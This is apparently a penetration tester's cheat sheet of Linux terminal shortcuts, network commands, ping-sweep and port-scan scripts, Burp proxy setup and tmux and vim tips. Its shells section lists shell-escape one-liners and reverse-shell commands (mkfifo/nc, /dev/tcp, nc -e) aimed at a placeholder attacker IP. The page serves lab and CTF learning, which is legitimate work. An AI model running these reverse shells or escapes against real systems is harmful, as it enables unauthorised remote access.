CSbyGB - Pentips
Useful commands and tools for pentest on Linux

Useful shortcuts and hacks to use the terminal quickly

  • Ctrl+U - clear the current line from the cursor back to the beginning (if the cursor is at the end of the line the whole line is cleared; otherwise only what is before the cursor is deleted)

  • Ctrl+Y - recall the cleared line

  • Ctrl+K - clear the current line from the cursor to the end (if the cursor is at the beginning of the line the whole line is cleared; otherwise only what is after the cursor is deleted ;) )

  • Ctrl+W - clear the previous word in the current line. For example if you have typed a command like git diff /path/to/some/file and you want to delete just the last parameter to the command, Ctrl+W is very useful.

  • Ctrl+E Ctrl+U - move the cursor to the end of the line and then clear the whole line.

  • Ctrl+C - cancel the current command line, which clears the whole line no matter where the cursor is (you can't recall the cleared line anymore).

  • Alt+Shift+# - comment the current line, keep it in the history and bring up your prompt on a new line.

  • Alt+Backspace - remove a word from your prompt

  • Ctrl+Shift+C - copy something you previously selected

  • Ctrl+Shift+V - paste something

  • Home or Ctrl+A - go to the beginning of your prompt

  • End or Ctrl+E - go to the end of your prompt

  • To clear the terminal you can use clear but you can also use Ctrl+L

  • Ctrl+Shift++ to zoom in your terminal

  • Ctrl+- to zoom out

  • If you have a command typed in your prompt and you want to open it with your default editor you can use Ctrl+X Ctrl+E

  • Ctrl+R to reverse search in your previously typed commands

  • !cmd will recall the last command that started with cmd. For example !cd will recall the last command that started with cd and !ls will recall the last command that started with ls

cd

  • Say you were in the directory /usr/share/wordlists and then you typed cd to go back home. If you want to go back to the wordlists directory you can use cd - (this command uses the $OLDPWD variable)

ls

  • Instead of typing ls -l you can use the alias ll

  • Instead of typing ls -la you can use the alias la

  • These aliases come from the default .bashrc of many distributions; run alias on its own to see which ones exist on your system

Sudo

  • If you typed a command but forgot to sudo it you can use sudo !! to rerun it with sudo

less

  • If you want to read a file but do not want to scroll if it is big you can use less FileName. Then using Enter or the down arrow you can read the following lines, and when you are done you can just type q

tail

  • tail FileName will print for you the last lines of a file

sort

  • Will sort the content of a file: sort filename

cmp

  • Will compare two files byte by byte: cmp file1 file2

  • Example of possible result: file1 file2 differ: char 280, line 18

Create an alias

  • If you have a command you use all the time but that is a little long you can use an alias to make it shorter: alias mycommand="the command you need" (no spaces around the =, otherwise bash treats the pieces as separate alias names). So for example after alias crazyls="ls -al", when you type crazyls you will get the result of ls -al

  • You can also edit your .bashrc file and add your aliases there. This will make them permanent.

Network commands

  • ifconfig - legacy interface configuration tool (net-tools); may not be installed on recent systems

  • ip a - show interfaces and their addresses

  • ip n - neighbour (ARP) table

  • ip r - show the routing table

  • iwconfig - wireless connection

  • arp -a - show the ARP cache (hosts seen on the local network; legacy net-tools)

  • route - get the routing table (legacy net-tools)

  • ping IP-ADD-OR-HOST - check if a host is up

  • netstat - show connections and listening ports (ss is the modern equivalent)

Pingsweep in bash

  • In his course Practical Ethical Hacking, Heath Adams shares this script, which is really convenient for an IP sweep (ping every host of a /24 once and print the ones that answer):

```bash
#!/bin/bash
# Usage: ./ipsweep.sh 192.168.1   (first three octets of the /24 to sweep)
if [ "$1" == "" ]
then
    echo "You forgot an IP address!"
    echo "Syntax: ./ipsweep.sh 192.168.1"
else
    for ip in $(seq 1 254); do
        # one ping per host in the background; keep the reply lines and print the address
        ping -c 1 "$1.$ip" | grep "64 bytes" | cut -d " " -f 4 | tr -d ":" &
    done
fi
```
  • To automate this further we could add an nmap script to run on the alive ip found.
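As an added example (not from the original page or the PEH course), this is one way to do that automation: the sweep writes the responding hosts to a file and nmap is then run only against those. It assumes Linux iputils ping (-W is a per-host timeout in seconds), nmap on the PATH, and the first three octets of the network as the only argument.

```shell
#!/bin/bash
# Added example (not from the original page or the PEH course): sweep a /24 with
# ping, keep the hosts that answered in a file, then run nmap only against those.
# Assumptions: Linux iputils ping (-W is a per-host timeout in seconds), nmap on
# the PATH, and $1 is the first three octets of the network, e.g. 192.168.1

# Parse ping output on stdin: keep the "64 bytes from A.B.C.D: ..." reply lines,
# take the address field, drop the trailing colon, and print each address once,
# sorted numerically octet by octet. Constructed ping output is enough to test it.
extract_alive() {
    grep "64 bytes" | cut -d " " -f 4 | tr -d ":" \
        | sort -t . -k 1,1n -k 2,2n -k 3,3n -k 4,4n -u
}

# Ping every host in the /24 once, all in parallel, and write the responders to $2.
# The background pings keep the pipe open, so extract_alive sees every reply.
sweep() {
    prefix="$1"
    out="$2"
    for i in $(seq 1 254); do
        ping -c 1 -W 1 "$prefix.$i" 2>/dev/null &
    done | extract_alive > "$out"
    echo "$(wc -l < "$out") host(s) up, written to $out"
}

# Scan only the hosts that answered: -iL reads the targets from the file and -oA
# saves the results in all three nmap formats for the report. Returns 1 (and runs
# nothing) when the file is empty or missing.
scan_alive() {
    targets="$1"
    if [ ! -s "$targets" ]; then
        echo "no live hosts in $targets, nothing to scan" >&2
        return 1
    fi
    nmap -sV -iL "$targets" -oA "scan-$(date +%Y%m%d-%H%M)"
}

# Only run the sweep when a network prefix is given on the command line.
if [ $# -eq 1 ]; then
    sweep "$1" alive.txt && scan_alive alive.txt
elif [ $# -gt 1 ]; then
    echo "Syntax: $0 192.168.1" >&2
    exit 1
fi
```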

Alternative port scan if nmap unvailable

  • Here is an internal port scanner in bash (credits to Tryhackme - Holo network). It relies on bash's /dev/tcp pseudo-device, so it works on a host where neither nmap nor nc is available:

```bash
#!/bin/bash
ports=(21 22 53 80 443 3306 8443 8080)
for port in ${ports[@]}; do
    # The redirect only succeeds if the TCP connect does; timeout 1 gives up on
    # filtered ports (nothing is printed for them). Errors go to /dev/null; the
    # original's "|| /dev/null" tried to execute /dev/null instead.
    timeout 1 bash -c "echo \"Port Scan Test\" > /dev/tcp/1.1.1.1/$port && echo $port is open || echo $port is closed" 2>/dev/null
done
```

  • Python port scan (credits to Tryhackme - Holo network)

```python
#!/usr/bin/python3
import socket

host = "1.1.1.1"  # placeholder target from the original
portList = [21, 22, 53, 80, 443, 3306, 8443, 8080]

for port in portList:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(1)  # do not hang on filtered ports
    try:
        s.connect((host, port))
        print("Port", port, "is open")
    except OSError:  # connection refused or timed out (socket.timeout is an OSError)
        print("Port", port, "is closed")
    finally:
        s.close()
```

  • netcat: nc -zv 192.168.100.1 1-65535 (-z only checks that the port accepts a connection without sending data, -v prints the result for each port)

read .db file

  • Install db-util: apt-get install db-util

  • Show everything that's in the file database.db: db_dump -p database.db

  • List the databases in the file database.db: db_dump -l database.db

  • Show only the content of the database mydb in the file database.db: db_dump -p -s mydb database.db

xclip

Install

  • sudo apt install xclip

Use

xclip is a tool that lets you send any command output to your clipboard. Let's say you have a big output to copy and do not want to fiddle with the mouse: you can use xclip.

  • cat myverybigfile | xclip -sel clipboard will send the content of myverybigfile to the clipboard

Vi or Vim

  • Vim is a text editor for writing code or editing Linux files. It can be found preinstalled on many Linux systems

  • vim /path/to/file open a file

  • i like insert to enter insert mode

  • x cut char

  • dw cut word

  • dd cut line

  • yw copy word

  • yy copy full line

  • p paste

  • esc to exit insert mode

  • : enter command mode

    • :1 go to line 1

    • :w write and save

    • :q quit

    • :q! quit without saving

    • :wq or ZZ write and quit

Note: it is possible to multiply a command for instance if you want to copy 3 words you can use 3yw

Strings

strings prints the human-readable character sequences found in a file. For a CTF, if we are looking for a specific string we can pipe it to grep

  • strings -e l file | grep -i FLAG the -e l option selects the encoding; l is for 16-bit little-endian (for example UTF-16LE strings in Windows binaries)

  • strings file is the basic use of the command

TMUX

"tmux is a terminal multiplexer. It lets you switch easily between several programs in one terminal, detach them (they keep running in the background) and reattach them to a different terminal." (tmux's own description)

  • sudo apt install tmux -y install tmux

  • tmux new -s sessionName create and join a new session

  • ctrl+b d detach a session

  • tmux ls list existing sessions

  • ctrl+b x kill the current pane (if it is the last pane, this ends the session)

  • tmux a -t sessionName or tmux a -t sessionId join an existing session

  • ctrl+b PageUp to scroll (enters copy mode) and q to leave scroll mode

Which architecture

  • lscpu will tell you if the CPU is 32- or 64-bit

  • uname -m similar but less verbose (prints the machine architecture, e.g. x86_64 or aarch64)

Shells

Spawning interactive shells

  • /bin/sh -i execute the shell interpreter specified in the path in interactive mode (-i).

  • With Perl

    • perl -e 'exec "/bin/sh";' or from a script perl: exec "/bin/sh";

  • With Ruby

    • ruby: exec "/bin/sh" has to be run from a script

  • With Lua

    • lua: os.execute('/bin/sh') has to be run from a script

  • With awk

    • awk 'BEGIN {system("/bin/sh")}'

  • With Find

    • find / -name nameoffile -exec /bin/awk 'BEGIN {system("/bin/sh")}' \;

    • find . -exec /bin/sh \; -quit This use of the find command uses the execute option (-exec) to initiate the shell interpreter directly. If find can't find the specified file, then no shell will be attained.

  • With vim

    • vim -c ':!/bin/sh'

    • Vim Escape: launch vim, then from command mode set the shell and spawn it

```
vim
:set shell=/bin/sh
:shell
```

Source HTB Academy

Bash Reverse shell

  • Say we have a way to run commands as root and we need to get a reverse shell; here are helpful commands

    • rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc IP-OF-YOUR-KALI 7777 > /tmp/f serve a Bash shell on a network socket utilizing a Netcat listener.

    • /bin/bash -i >& /dev/tcp/IP-OF-YOUR-KALI/4444 0>&1

    • nc IP-OF-YOUR-KALI 4444 -e /bin/bash

    • nc IP-OF-YOUR-KALI 4444 -e /bin/sh

    • bash -c 'bash -i >& /dev/tcp/IP-OF-YOUR-KALI/4444 0>&1' this one is symbol safe; it is useful when doing it in a URL or something like this.

Note: We have to set a listener prior to this with rlwrap nc -lvp 4444. There are plenty of options for bash and you can even encode the payload if you need to.

Permissions cheat sheet

(Image: chmod permissions cheat sheet. Source: Chmod tutorial by Ryan Morrison)

Explainshell.com

Explainshell.com is really helpful to understand what a specific Linux command does. Here is an example with rm -rf file (screenshot of the explainshell output).

Route your scripts through burp

  • export https_proxy=http://server-ip:port/ for example export https_proxy=http://127.0.0.1:8080/ (set http_proxy the same way if the script also makes plain-HTTP requests)

  • You will need to add Burp's CA certificate to the system trust store, otherwise TLS requests through the proxy fail certificate validation

    • Export the Burp CA certificate as burp.der (Proxy settings, "Import / export CA certificate", DER format)

    • Convert it to PEM: openssl x509 -inform der -in burp.der -out burp.pem

    • Install the Burp certificate:

      • cp burp.pem /etc/ssl/certs/ (will need sudo if not root)

      • update-ca-certificates (will need sudo if not root)

      • cp burp.pem burp.crt

      • sudo cp burp.crt /usr/local/share/ca-certificates/

      • sudo cp burp.crt /usr/share/ca-certificates/

    • update-ca-certificates picks up the .crt files in /usr/local/share/ca-certificates/, so run it again after the copies above if the certificate is still not trusted

  • Every time you launch a script you should see the traffic in Burp

Resources

  • Vim cheat sheet

  • TMUX Cheat Sheet

  • Introduction to tmux - IppSec

  • Reverse shell generator (an amazing website to generate reverse shells)

  • Chmod tutorial by Ryan Morrison

  • Explainshell.com

  • Shortcut to clear command line terminal (Ask Ubuntu)

  • GitHub - andrew-d/static-binaries: Various *nix tools built as statically-linked binaries

  • Upgrading Simple Shells to Fully Interactive TTYs (ropnop blog)

  • you need to HACK faster!! (Linux Terminal hacks YOU NEED!!) (NetworkChuck)